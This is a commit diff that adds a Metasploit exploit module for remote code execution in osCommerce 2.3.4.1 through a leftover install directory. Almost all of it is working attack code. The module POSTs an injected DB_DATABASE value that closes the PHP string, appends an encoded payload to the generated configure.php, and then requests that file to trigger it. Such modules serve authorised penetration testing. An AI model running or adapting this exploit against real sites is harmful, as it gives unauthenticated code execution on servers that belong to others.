osCommerce Module

2018-04-05 20:28:14 +01:00 · 2018-04-05 20:28:14 +01:00 · b5681cb954
parent bcef50b062
commit b5681cb954
1 changed files with 69 additions and 0 deletions
--- a/modules/exploits/multi/http/osCommerce.rb
+++ b/modules/exploits/multi/http/osCommerce.rb
@ -0,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'osCommerce 2.3.4.1 - Remote Code Execution',
+      'Description'    => %q{
+         If the /install/ directory was not removed, it is possible for an unauthenticated
+         attacker to run the "install_4.php" script, which will create the configuration
+         file for the installation. This allows the attacker to inject PHP code into the
+         configuration file and execute it.
+      },
+      'Author'         => [
+        'Simon Scannell',      # Original exploit author
+        'Daniel Teixeira'      # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '44374'],
+        ],
+        'Payload'      =>
+        {
+          'BadChars' => "\x00",
+        },
+       'Privileged' => false,
+       'Platform'   => ['php'],
+       'Arch'       => ARCH_PHP,
+       'Targets' =>
+            [
+                [ 'osCommerce 2.3.4.1', { } ],
+            ],
+      'DisclosureDate' => 'Apr 30 2018',
+      'DefaultTarget' => 0))
+     register_options(
+    [
+      OptString.new('INSTALLURL', [true, 'The path to the install file', '/catalog/install/install.php?step=4']),
+      OptString.new('TARGETURI', [true, 'The path to the configure.php file', '/catalog/install/includes/configure.php'])
+    ], self.class)
+  end
+
+  def trigger
+    res = send_request_cgi({
+      'uri'     => normalize_uri(datastore['TARGETURI']),
+      'method'  => 'GET',
+  })
+  end
+
+  def exploit
+    uri = target_uri.path
+    data = "DIR_FS_DOCUMENT_ROOT=./&DB_DATABASE=');"
+    data << payload.encoded
+    data << "/*"
+
+    res = send_request_cgi({
+      'uri'     => normalize_uri(datastore['INSTALLURL']),
+      'method'  => 'POST',
+      'data'    => data,
+     })
+  trigger
+  end
+end